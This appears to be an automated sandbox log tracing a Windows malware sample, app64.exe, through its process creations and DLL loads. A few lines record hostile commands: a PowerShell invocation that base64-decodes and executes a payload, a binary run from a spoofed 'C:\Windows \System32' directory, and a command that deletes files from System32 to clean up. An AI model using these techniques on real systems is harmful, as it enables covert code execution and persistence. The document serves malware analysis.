Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows \System32\printui.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Users\user\Desktop\app64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Users\user\Desktop\app64.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\app64.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: devobj.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ntmarta.dll
Source: C:\Windows \System32\printui.exe Section loaded: uxtheme.dll
Source: C:\Windows \System32\printui.exe Section loaded: printui.dll
Source: C:\Windows \System32\printui.exe Section loaded: cryptbase.dll
Source: C:\Windows \System32\printui.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcurl.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libpq.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: zlib1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libssl-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcrypto-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libintl-9.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libcrypto-3-x64.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libwinpthread-1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: libiconv-2.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
